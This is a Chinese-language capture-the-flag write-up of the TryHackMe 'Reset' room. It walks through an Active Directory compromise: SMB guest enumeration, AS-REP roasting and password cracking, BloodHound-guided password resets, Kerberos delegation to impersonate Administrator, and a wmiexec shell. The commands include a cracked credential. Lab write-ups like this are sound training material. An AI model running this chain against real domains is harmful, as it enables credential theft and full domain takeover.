Reset on Tryhackme

, , , , , , , , ,

Before all

好久沒打ADㄌ,開心>w<
而且今天學到超多東西,也釐清了不少觀念

Victim’s IP : 10.10.24.60
Victim’s Host : thm.corp
Attacker’s IP : 10.9.195.189

Write Up

RECON

port scan 

1
rustscan -a 10.10.24.60 --ulimit 5000 -- -sC -sV -Pn

Result
image
很標準的AD環境,有SMB, Kerberos, ldap, RDP …
也獲得了域名為thm.corp

Exploit

smb

crackmapexec
由nmap結果知道smb服務可以Anonymous,連進去抓檔案: 

1
crackmapexec smb 10.10.24.60 -u 'guest' -p '' --rid-brute

Result
image

拿到使用者列表,利用 Impacket 庫進行下一步攻擊。
GetNPUsers.py

1
python3 GetNPUsers.py thm.corp/ -usersfile ~/ctf/tryhackme/reset/userlist.txt -no-pass

GetNPUsers可以抓到不需要使用前面驗證的使用者TGT,並嘗試本地爆破。
john-the-ripper

1
2
3
4
5
6
7
8
9
10
11
12
13
john-the-ripper npusers_pass --wordlist=/home/wha13/wordlists/rockyou.txt
```  

獲得使用者`TABATHA_BRITT`的密碼
利用smbmap獲取目錄內容:  
```bash
smbmap -u 'TABATHA_BRITT' -p 'marlboro(1985)' -H 10.10.24.60
```  
![image](https://hackmd.io/_uploads/SyRXl2d4C.png)  
  
利用 smbclient 登入並抓去 Data 資料夾:  
```bash
smbclient -U THM.CORP\\TABATHA_BRITT \\\\10.10.24.60\\Data

把抓下來的pdf打開看看發現使用者LILY_ONEILL的密碼
image

不過這是rabbit hole

Impersonate

Impersonate是抓到有Delegate權限時,可以對host內任意使用者作暫時的 impersonate 去獲得暫時的token進行登入
image

BloogHound

1
bloodhound-python -c All -u 'TABATHA_BRITT' -p 'marlboro(1985)' -d thm.corp -ns 10.10.24.60 --zip

抓zip檔案起來分析,從剛剛拿到的使用者TABATHA_BRITT開始
發現一連串對下一個使用者的全權限或者更改密碼權限
image 

1
net rpc password "SHAWNA_BRAY" "whale120" -U "thm.corp"/"TABATHA_BRITT"%"marlboro(1985)" -S 10.10.24.60

像是這樣,最後可以打到user DARLA_WINTERS@THM.CORP
getST

1
2
sudo ./getST.py -spn "cifs/haystack.thm.corp" -impersonate "Administrator" "thm.corp/DARLA_WINTERS:Whale120"
export KRB5CCNAME=Administrator@cifs_haystack.thm.corp@THM.CORP.ccache

wmiexec
透過IPC$連線的腳本,可以支援直接登入/NTLM認證等

1
python3 ./wmiexec.py -k -no-pass Administrator@haystack.thm.corp

After all

晚安世界 >w<